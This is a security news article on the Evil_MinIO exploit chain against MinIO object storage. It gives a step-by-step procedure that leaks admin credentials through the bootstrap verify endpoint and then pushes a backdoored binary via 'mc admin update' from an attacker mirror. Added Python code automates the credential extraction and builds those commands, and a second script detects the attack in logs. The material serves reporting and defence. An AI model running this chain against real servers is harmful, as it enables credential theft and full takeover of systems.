Publicly available Evil_MinIO exploit used in attacks on MinIO Storage Systems

Pierluigi Paganini September 04, 2023

A threat actor was spotted exploiting MinIO storage system vulnerabilities to execute arbitrary code on affected servers.

Security Joes researchers have observed an unknown threat actor using a publicly available exploit chain for vulnerabilities in the MinIO Object Storage system to achieve arbitrary code execution on vulnerable servers.

Object storage is a data storage architecture that packages unstructured data into units called “objects” and keeps them in a flat, non-hierarchical namespace. The leading providers of such services are AWS, Google Cloud, and Microsoft Azure.

Upon investigating, Security Joes researchers found that the exploit chain had not previously been observed in the wild, or at least had not been documented.

“The chain of vulnerabilities observed by our team during an attack we’ve investigated presents a worrisome situation where attackers can potentially gain the ability to remotely execute code and take full control over systems running vulnerable versions of the high-performance and distributed object storage system called MinIO.” reads the report published by Security Joes. “This product is part of a larger set of “non-yet-existing” set of attack vectors referred to as Non-native Object Storage Services.”

The exploit, dubbed Evil_MinIO, chains CVE-2023-28434 (CVSS score: 8.8) and CVE-2023-28432 (CVSS score: 7.5); the latter is the information-disclosure bug in the bootstrap verify endpoint described below. MinIO fixed both issues in RELEASE.2023-03-20T20-16-18Z.

In April, the US Cybersecurity and Infrastructure Security Agency (CISA) added MinIO vulnerability CVE-2023-28432 to its Known Exploited Vulnerabilities catalog.

The researchers found that the Evil_MinIO exploit code is available in a public GitHub repository.

Remote attackers can exploit the flaws to expose sensitive information stored in the compromised installation and to achieve Remote Code Execution (RCE) on the host where the MinIO application runs.

An attacker can trigger the issue by sending a crafted, unauthenticated POST request to the endpoint “/minio/bootstrap/v1/verify”; the response discloses the server's environment variables, which is how the admin credentials of a vulnerable instance are retrieved.

“The exploitation process begins with a crafted request targeting the endpoint “/minio/bootstrap/v1/verify”, which allows the attacker to obtain the values of the environment variables used by the application.” continues the report. “This becomes particularly significant because MinIO relies on environment variables to configure the administrator credentials, escalating the severity of the vulnerability. In other words, with a single request, an attacker can retrieve the admin credentials of a vulnerable instance.”

The mc admin update command updates all MinIO servers in the deployment; it also accepts a private mirror server URL for environments where the deployment has no public internet access.

Because the update source is simply whatever URL the administrator supplies, an attacker who holds the leaked admin credentials can point the update at a server of their own and push an ‘evil’ binary in place of the authentic MinIO release.

Below is the step-by-step procedure to remotely execute arbitrary code on a vulnerable MinIO instance:

  • 1. Send a POST request to the endpoint /minio/bootstrap/v1/verify to expose the credentials of the admin account.
  • 2. Configure a MinIO client (mc) to interact with the vulnerable instance using the credentials obtained in Step 1. For this, the following commands are required:
    mc alias set [ALIAS] [URL_TARGET_MINIO] [ACCESS_KEY] [SECRET_KEY]
    mc alias list
  • 3. Trigger the update process on the compromised MinIO instance, pointing it at a malicious payload hosted on a remote server. For this, the following command is required:
    mc admin update [ALIAS] [MIRROR_URL] --yes
  • 4. The “evil” MinIO binary is installed; it now contains a global backdoor that allows the attacker to execute commands on the host.
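The chain above, worked through as an added example (this is not code from the Security Joes report or from the Evil_MinIO repository). It assumes, since the article does not show the response format, that the verify endpoint answers with a JSON object whose "MinioEnv" member maps environment-variable names to values, and that the admin credentials sit in MINIO_ROOT_USER / MINIO_ROOT_PASSWORD (or the legacy MINIO_ACCESS_KEY / MINIO_SECRET_KEY). The sample response body and the target and mirror URLs are constructed placeholders. The probe() function performs step 1 against an instance you own and is not called by the demo, so the script runs offline.

```python
"""Triage helper for the Evil_MinIO chain described above.

Added example, not code from the Security Joes report or the Evil_MinIO repository.
Assumptions the article does not state:
  * the vulnerable verify endpoint answers with a JSON object whose "MinioEnv"
    member maps environment-variable names to values;
  * the admin credentials sit in MINIO_ROOT_USER / MINIO_ROOT_PASSWORD (or the
    legacy MINIO_ACCESS_KEY / MINIO_SECRET_KEY).
SAMPLE_VERIFY_BODY is a constructed response, not captured data.
"""
import json
import shlex
from urllib import request

VERIFY_PATH = "/minio/bootstrap/v1/verify"

# Constructed stand-in for what a vulnerable server returns to the step-1 POST.
SAMPLE_VERIFY_BODY = json.dumps({
    "MinioEndpoints": [{"SetCount": 1, "DrivesPerSet": 4,
                        "Endpoints": ["http://minio1:9000/data"]}],
    "MinioEnv": {
        "MINIO_ROOT_USER": "minioadmin",
        "MINIO_ROOT_PASSWORD": "S3cr3t-Pa55",
        "MINIO_SERVER_URL": "http://minio1:9000",
    },
})

# Credential pairs to look for: current names first, legacy names second (assumed).
CRED_KEYS = (
    ("MINIO_ROOT_USER", "MINIO_ROOT_PASSWORD"),
    ("MINIO_ACCESS_KEY", "MINIO_SECRET_KEY"),
)


def leaked_env(body: str) -> dict:
    """Environment variables disclosed by a verify response ({} if none, or not JSON)."""
    try:
        env = json.loads(body).get("MinioEnv")
    except (ValueError, AttributeError):
        return {}
    return dict(env) if isinstance(env, dict) else {}


def extract_credentials(body: str):
    """(access_key, secret_key) from a verify response, or None when nothing usable leaked."""
    env = leaked_env(body)
    for user_key, pass_key in CRED_KEYS:
        if env.get(user_key) and env.get(pass_key):
            return env[user_key], env[pass_key]
    return None


def build_mc_commands(target_url, access_key, secret_key, mirror_url, alias="target"):
    """The mc lines for steps 2 and 3, shell-quoted so a secret containing
    metacharacters cannot break (or be misparsed on) the command line."""
    q = shlex.quote
    return [
        f"mc alias set {q(alias)} {q(target_url)} {q(access_key)} {q(secret_key)}",
        "mc alias list",
        f"mc admin update {q(alias)} {q(mirror_url)} --yes",
    ]


def probe(base_url: str, timeout: float = 5.0) -> str:
    """Step 1 against an instance you own: POST with an empty body, return the raw reply.
    Not called by the demo below, so the script runs offline."""
    req = request.Request(base_url.rstrip("/") + VERIFY_PATH, data=b"", method="POST")
    with request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    creds = extract_credentials(SAMPLE_VERIFY_BODY)
    print(f"{len(leaked_env(SAMPLE_VERIFY_BODY))} environment variables leaked; credentials: {creds}")
    if creds:
        for line in build_mc_commands("http://minio1:9000", *creds, "http://198.51.100.5/mirror"):
            print(line)
```

Run it against your own instances by calling probe("http://host:9000") and feeding the result to extract_credentials(): a response that leaks a root credential pair means the server still needs the fix release, regardless of what else the environment contains.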

The experts pointed out that, unlike a web shell deployment, the MinIO attack scenario leaves no conventional suspicious scripts on disk: the backdoor lives inside the replaced server binary itself.

“The intricate nature of this threat renders traditional signature-based detectors inadequate in capturing its presence, as demonstrated in Figure 7. Remarkably, even a month after its initial report, the file continues to exhibit zero detections through traditional signature-based detection mechanisms.” continues the report.
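Since the backdoored binary evades signature scanning, the remaining handles are the behaviour the chain produces and the integrity of the installed binary. The following is an added example (not from the Security Joes report) of both checks. It assumes, beyond what the article states, that request logs are available in a "CLIENT_IP METHOD PATH STATUS" form, that mc admin update reaches the server as a POST to /minio/admin/v3/update with the mirror in an updateURL query parameter (that path is an assumption), and that the operator knows the cluster's own node addresses and the vendor's published sha256 for the installed minio binary. The log lines are constructed; the IP addresses are documentation ranges.

```python
"""Behavioural and integrity checks for the Evil_MinIO chain, to complement
signature scanning.

Added example, not from the Security Joes report. Assumptions not on the page:
  * request logs in "CLIENT_IP METHOD PATH STATUS" form (SAMPLE_LOG is constructed);
  * mc admin update arrives as POST /minio/admin/v3/update?updateURL=... (assumed path);
  * the operator knows the cluster node addresses and the expected binary checksum.
"""
import hashlib
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(r"^(?P<ip>\S+) (?P<method>[A-Z]+) (?P<target>\S+) (?P<status>\d{3})$")

VERIFY_PATH = "/minio/bootstrap/v1/verify"
UPDATE_PATH = "/minio/admin/v3/update"   # assumed admin update endpoint


def analyze_log(lines, cluster_nodes, trusted_mirror_hosts):
    """Return (client_ip, reason) findings for stage 1 (credential leak) and
    stage 3 (binary replacement) of the chain.

    Bootstrap verification is something cluster peers do to each other, so a verify
    POST from any other source is suspicious; an admin update whose mirror host is
    not one you operate is the step that installs the backdoored binary."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue   # not a request line in the expected shape; skip, never crash
        ip, method, target = m.group("ip", "method", "target")
        parts = urlsplit(target)
        if method != "POST":
            continue
        if parts.path == VERIFY_PATH and ip not in cluster_nodes:
            findings.append((ip, "bootstrap verify from non-cluster source (stage 1: env/credential leak)"))
        elif parts.path == UPDATE_PATH:
            mirror = parse_qs(parts.query).get("updateURL", [""])[0]
            host = urlsplit(mirror).hostname or ""
            if host not in trusted_mirror_hosts:
                findings.append((ip, f"admin update from untrusted mirror {mirror!r} (stage 3: binary replacement)"))
    return findings


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def file_sha256(path: str) -> str:
    """Streaming sha256 of a file (binaries are large; do not read them whole)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def binary_matches(path: str, expected_sha256: str) -> bool:
    """True when the on-disk minio binary still carries the vendor's checksum.
    A mismatch after an unexplained admin update is the Evil_MinIO footprint."""
    return file_sha256(path) == expected_sha256.strip().lower()


# Constructed sample: two cluster nodes (10.0.0.11/.12) and one outside client.
SAMPLE_LOG = """\
10.0.0.11 POST /minio/bootstrap/v1/verify 200
10.0.0.12 POST /minio/bootstrap/v1/verify 200
203.0.113.7 POST /minio/bootstrap/v1/verify 200
203.0.113.7 GET /minio/admin/v3/info 200
203.0.113.7 POST /minio/admin/v3/update?updateURL=http://198.51.100.5/minio 200
10.0.0.11 POST /minio/admin/v3/update?updateURL=https://mirror.corp.example/minio 200
"""

if __name__ == "__main__":
    hits = analyze_log(SAMPLE_LOG.splitlines(), {"10.0.0.11", "10.0.0.12"}, {"mirror.corp.example"})
    for ip, why in hits:
        print(ip, why)
```

In the sample, only the outside client trips both stages; the in-cluster verify traffic and the update from the corporate mirror are left alone. For the integrity check, compare file_sha256("/usr/local/bin/minio") against the checksum MinIO publishes for the release you deployed; the check is only as good as the reference value, so take it from the vendor's release metadata, not from the host under investigation.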

According to the experts, the threat actor behind the attack has a distinct profile, showing a significant degree of experience and expertise with bash scripts and Python. The attackers also used the backdoor access to drop supplementary payloads for post-exploitation activities.

The attackers are able to target both Linux and Windows systems using platform-specific downloader scripts.

At the time the report was published, a Shodan search by the researchers turned up over 50,000 MinIO instances exposed online.

The report also includes Indicators of Compromise (IoCs) for this campaign.
